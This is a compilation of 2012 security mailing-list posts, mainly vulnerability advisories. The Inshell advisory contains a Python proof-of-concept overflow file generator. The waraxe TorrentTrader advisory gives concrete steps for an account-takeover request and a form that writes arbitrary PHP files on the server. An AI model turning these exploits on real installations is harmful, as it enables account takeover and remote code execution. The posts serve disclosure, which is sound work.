4ca418335fbedb6806c37a18ee82a3a1 dhcp-4.1_ESV_R7-i486-1_slack13.0.txz Slackware x86_64 13.0 package: 55e54c1a7d15ffb9fbe060e91308140b dhcp-4.1_ESV_R7-x86_64-1_slack13.0.txz Slackware 13.1 package: af60f47b8f903a0bf3465bb6975ad596 dhcp-4.1_ESV_R7-i486-1_slack13.1.txz Slackware x86_64 13.1 package: 08721f29288b9420a9807da752333673 dhcp-4.1_ESV_R7-x86_64-1_slack13.1.txz Slackware 13.37 package: c89162e707c91d1c01530334ec504da8 dhcp-4.2.4_P2-i486-1_slack13.37.txz Slackware x86_64 13.37 package: 2f8c5d72bf67eeffb73a9e7dc8fb0d36 dhcp-4.2.4_P2-x86_64-1_slack13.37.txz Slackware -current package: 74b7290a3d2a8b1c5beef845f0d9b756 n/dhcp-4.2.4_P2-i486-1.txz Slackware x86_64 -current package: 71e9db99927cf7fece9dd137a2bb0c23 n/dhcp-4.2.4_P2-x86_64-1.txz Installation instructions: ++ Upgrade the package as root: # upgradepkg dhcp-4.2.4_P2-i486-1_slack13.37.txz Then, restart the dhcp daemon. +-+ Slackware Linux Security Team http://slackware.com/gpg-key secur...@slackware.com ++ | To leave the slackware-security mailing list: | ++ | Send an email to majord...@slackware.com with this text in the body of | | the email message: | || | unsubscribe slackware-security | || | You will get a confirmation message back containing instructions to| | complete the process. Please do not reply to this email address. | ++ -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.12 (GNU/Linux) iEYEARECAAYFAlBTlwQACgkQakRjwEAQIjOKngCfUfJA6x85nf5DamV/XKUvLxLa +D4AnjsMSZFdiBdxQ6T4qIqXiW5DXC3R =CBrL -END PGP SIGNATURE-
IPv6 Toolkit v1.2.3 released! (and upcoming IPv6 security trainings)
Folks, I realize we never announced the toolkit on these lists, so here you go. ** SI6 Networks' IPv6 toolkit ** We've released SI6 Networks' IPv6 toolkit v1.2.3. It is available at: http://www.si6networks.com/ipv6toolkit. The toolkit contains a number of IPv6 security/troubleshooting tools, such as: * An IPv6 local network scanner (scan6) * An IPv6 fragmentation attack/assessment tool (frag6) * A tool to craft arbitrary TCP/IPv6 segments (tcp6) * A tool to craft arbitrary Router Advertisements (ra6) and many, many others This version of the toolkit has been fully-ported to Mac OS (the list of supported systems now including, at the very least, FreeBSD, NetBSD, OpenBSD, Linux, and Mac OS), and also incorporates a number of patches sent by the community. Any feedback on the tools will be welcome (either unicast to me, or to the ipv6hackers mailing-list http://lists.si6networks.com/listinfo/ipv6hackers/). ** IPv6 security trainings ** Development of the IPv6 toolkit is partially supported through our IPv6 security trainings http://www.hackingipv6networks.com. Please consider attending one of our trainings. The list of already-scheduled trainings can be found at: http://www.hackingipv6networks.com/upcoming-t, and currently includes trainings in Ghent (Belgium), Lisbon (Portugal), and Rio de Janeiro (Brazil). Please follow us on Twitter to get the latest news about the IPv6 Toolkit and IPv6 security: @SI6Networks Thanks! Best regards, -- Fernando Gont SI6 Networks e-mail: fg...@si6networks.com PGP Fingerprint: 31C6 D484 63B2 8FB1 E3C4 AE25 0D55 1D4E 7492
[IA38] NCMedia Sound Editor Pro v7.5.1 MRUList201202.dat File Handling Local Buffer Overflow
Inshell Security Advisory http://www.inshell.net 1. ADVISORY INFORMATION --- Product:Sound Editor Pro v7.5.1 Vendor URL: www.soundeditorpro.com Type: Stack-based Buffer Overflow [CWE-121] Date found: 2012-08-15 Date published: 2012-09-16 CVSSv2 Score: 6,9 (AV:L/AC:M/Au:N/C:C/I:C/A:C) CVE:- 2. CREDITS -- This vulnerability was discovered and researched by Julien Ahrens from Inshell Security. 3. VERSIONS AFFECTED NCMedia Sound Editor Pro v7.5.1, older versions may be affected too. 4. VULNERABILITY DESCRIPTION A Local Buffer Overflow Vulnerability has been found on the NCMedia Sound Editor Pro v7.5.1. The application saves the paths for all recently used files in a file called MRUList201202.dat in the directory %appdata%\Sound Editor Pro\. When clicking on the File menu item the application reads the contents of the file, but does not validate the length of the string loaded from the file before passing it to a buffer, which leads to a Stack-based Buffer Overflow. An attacker needs to force the victim to place an arbitrary MRUList201202.dat file into the target directory. 5. PROOF-OF-CONCEPT (CODE / EXPLOIT) #!/usr/bin/python file=MRUList201202.dat junk1=\x41 * 4124 boom=\x42\x42\x42\x42 junk2=\x43 * 100 poc=junk1 + boom + junk2 try: print [*] Creating exploit file...\n writeFile = open (file, w) writeFile.write( poc ) writeFile.close() print [*] File successfully created! except: print [!] Error while creating file! For further screenshots and/or PoCs visit: http://security.inshell.net/advisory/38 6. SOLUTION --- None 7. REPORT TIMELINE -- 2012-08-15: Initial notification sent to vendor 2012-08-22: No response, second notification sent to vendor 2012-08-29: No response, third notification sent to vendor 2012-09-16: No response 2012-09-16: Full Disclosure according to disclosure policy 8. REFERENCES - http://security.inshell.net
Secunia Research: Novell GroupWise iCalendar Date/Time Parsing Denial of Service
== Secunia Research 17/09/2012 - Novell GroupWise iCalendar Date/Time Parsing Denial of Service - == Table of Contents Affected Software1 Severity.2 Vendor's Description of Software.3 Description of Vulnerability.4 Solution.5 Time Table...6 Credits..7 References...8 About Secunia9 Verification10 == 1) Affected Software * Novell GroupWise 8.0.2 HP3 NOTE: Other versions may also be affected. == 2) Severity Rating: Moderately critical Impact: Denial of Service Where: Remote == 3) Vendor's Description of Software Novell GroupWise 8 gives you a wide range of collaborative tools to create a truly plugged in work environment.. Product Link: http://www.novell.com/products/groupwise/ == 4) Description of Vulnerability Secunia Research has discovered a vulnerability in Novell GroupWise, which can be exploited by malicious people to cause a DoS (Denial of Service). Novell GroupWise includes the GroupWise Internet Agent (GWIA), which is responsible for exchanging e-mail messages between GroupWise and the Internet via e.g. IMAP4, POP3, and SMTP. The GroupWise Internet Agent also supports parsing of iCalendar data, which is implemented in g1.dll. The iCalendar format is used to exchange calendar information and is comprised of various groupings of component properties. Some of these properties may include date-time information, which can e.g. be specified via the TZID parameter of a DTSTART property in a VTIMEZONE component. Date-Time information is formatted as: [date]T[time] where [date] is 8 characters and [time] is 6 characters (e.g. 20120915T23 means September 15th, 2012 at 11 PM). NgwiCalTimeProperty::datetime() in g1.dll is responsible for parsing date-time information. When called, the function in turn calls NgwiCalTimeProperty::date() to parse the date in the date-time string. Upon exiting, NgwiCalTimeProperty::date() returns a pointer to offset 8 into the date-time string (i.e. where the 'T' and following time information is expected to be). This returned pointer is then dereferenced in order to evaluate whether the referenced character is 'T' and parse the expected time information. However, no checks are performed by the function to ensure that the supplied date-time string is longer than 8 characters. This may result in an out-of-bounds read access violation, causing GWIA to crash in case a shorter date-time string was supplied via e.g. an e-mail with a specially crafted .ics attachment. == 5) Solution Update to version 8.0 Support Pack 3 or later. == 6) Time Table 20/10/2011 - Vendor notified. 20/10/2011 - Vendor response. 21/12/2011 - Vendor asks for additional information. 21/12/2011 - Clarification provided to the vendor. 21/12/2011 - Vendor response. 08/03/2012 - Vendor provides status update. 18/05/2012 - Vendor provides status update. 29/06/2012 - Status update requested. 29/06/2012 - Vendor provides status update. 06/08/2012 - Vendor provides status update. 13/09/2012 - Vendor provides status update. 14/09/2012 - Vendor provides status update. 17/09/2012 - Public disclosure. == 7) Credits Discovered by Carsten Eiram, Secunia Research. == 8) References The Common Vulnerabilities and Exposures (CVE) project has assigned CVE-2011-3827 for the vulnerability. Novell: http://www.novell.com/support/kb/doc.php?id=7010767 == 9) About Secunia Secunia offers vulnerability management solutions to corporate customers with verified and reliable vulnerability intelligence relevant to their specific system configuration: http://secunia.com/advisories/business_solutions/ Secunia also provides a publicly accessible and comprehensive advisory database as a
[waraxe-2012-SA#089] - Multiple Vulnerabilities in TorrentTrader 2.08
[waraxe-2012-SA#089] - Multiple Vulnerabilities in TorrentTrader 2.08 === Author: Janek Vind waraxe Date: 17. September 2012 Location: Estonia, Tartu Web: http://www.waraxe.us/advisory-89.html Description of vulnerable software: ~~~ TorrentTrader is a feature packed and highly customisable PHP/MySQL Based BitTorrent tracker. Featuring integrated forums, and plenty of administration options. http://sourceforge.net/projects/torrenttrader/ http://www.torrenttrader.org/topic/14292-torrenttrader-v208-released/ ### 1. Unauthorized Email Change in account-ce.php ### Reason: authorization bypass Attack vector: user submitted GET parameters id, secret and email Preconditions: none Result: attacker can change any user's email, including admin's -[ source code start ]- $id = (int) $_GET[id]; $md5 = $_GET[secret]; $email = $_GET[email]; .. $res = SQL_Query_exec(SELECT `editsecret` FROM `users` WHERE `enabled` = 'yes' AND `status` = 'confirmed' AND `id` = '$id'); $row = mysql_fetch_assoc($res); .. $sec = $row[editsecret]; if ($md5 != md5($sec . $email . $sec)) show_error_msg(T_(ERROR), T_(NOTHING_FOUND), 1); SQL_Query_exec(UPDATE `users` SET `editsecret` = '', `email` = .sqlesc($email). WHERE `id` = '$id' AND `editsecret` = . sqlesc($row[editsecret])); -[ source code end ]--- Tests: Let's find md5 hash of email t...@test.com, which is b642b4217b34b1e8d3bd915fc65c4452. Target user ID is 1. We issue GET request: http://localhost/torrenttrader208/account-ce.php?id=1; secret=b642b4217b34b1e8d3bd915fc65c4452email=t...@test.com Quick look to the database confirms, that email address of user with ID 1 has been changed indeed. Next logical move for attacker is password recovery request: http://localhost/torrenttrader208/account-recover.php After admin account takeover attacker is able to use next vulnerability, described below, which may allow php remote code execution. ### 2. Arbitrary file creation / directory traversal in nfo-edit.php ### Reason: failure to properly sanitize user submitted data Attack vector: user submitted POST parameters id and content Preconditions: 1. nfo-file editing privileges needed (usually admin) 2. PHP must be 5.3.4 for null-byte attacks to work Result: 1. attacker is able to write remote files with arbitrary content 2. directory traversal vulnerability allows bypassing path restrictions -[ source code start ]- $id = (int)$_GET[id]?$_GET[id]:$_POST[id]; $do = $_POST[do]; $nfo = $site_config[nfo_dir] . /$id.nfo; if ($do == update) { if (file_put_contents($nfo, $_POST[content])) { write_log(NFO ($id) was updated by $CURUSER[username].); -[ source code end ]--- Test: first we need html form like the one below: htmlbodycenter form action=http://localhost/torrenttrader208/nfo-edit.php; method=post enctype=multipart/form-data input type=hidden name=do value=update input type=hidden name=id value=test.php input type=hidden name=content value=?php phpinfo();? input type=submit value=Test /form/center/body/html Log in as admin and then make POST request by cliking Test button. We should see NFO Updated as response and can confirm new file existence: http://localhost/torrenttrader208/uploads/test.php.nfo By using null byte (\0) it's possible writing files with arbitrary extension. Finally, it is possible to make use of directory traversal strings ../ and write files to arbitrary location in remote server. ### 3. Username Enumeration Vulnerability in account-login.php ### Reason: different error messages for invalid username and invalid password Attack vector: user submitted POST parameters username and password Preconditions: none Result: attacker can enumerate valid usernames -[ source code start ]- if (!empty($_POST[username]) !empty($_POST[password])) { $res = SQL_Query_exec(SELECT id, password, secret, status, enabled FROM users WHERE username = . sqlesc($_POST[username]) . ); $row = mysql_fetch_array($res); if (!$row) $message = T_(USERNAME_INCORRECT); elseif ($row[status] == pending)
[Positive Research] Intel SMEP overview and partial bypass on Windows 8 (whitepaper)
Intel SMEP overview and partial bypass on Windows 8 (whitepaper). ... It is natural to conclude that if you cant store your shellcode in the user-mode, you have to find a way to store it somewhere in the kernel space. The most obvious solution is using windows objects such as WinAPI (Events, Timers, Sections etc) or GDI (Brushes, DCs etc). They are accessed indirectly from the user-mode via WinAPI that uses system calls. The point is that the object body is kept in the kernel and somehow some object fields can be modified from the user-mode, so an attacker can transfer the needed shellcode bytes from the user-mode memory to the kernel-mode. ... -[ Full details ] ---[ Blog http://blog.ptsecurity.com/2012/09/intel-smep-overview-and-partial-bypass.html ---[ Whitepapers English version (PDF): http://www.ptsecurity.com/download/SMEP_overview_and_partial_bypass_on_Windows_8.pdf Russian version (PDF): http://www.ptsecurity.ru/download/Technology_Overview_Intel_SMEP_and_partial_bypass_on_Windows_8.pdf Thx! - AShishkin[at]ptsecurity[dot]ru http://www.ptsecurity.com http://blog.ptsecurity.com http://www.phdays.com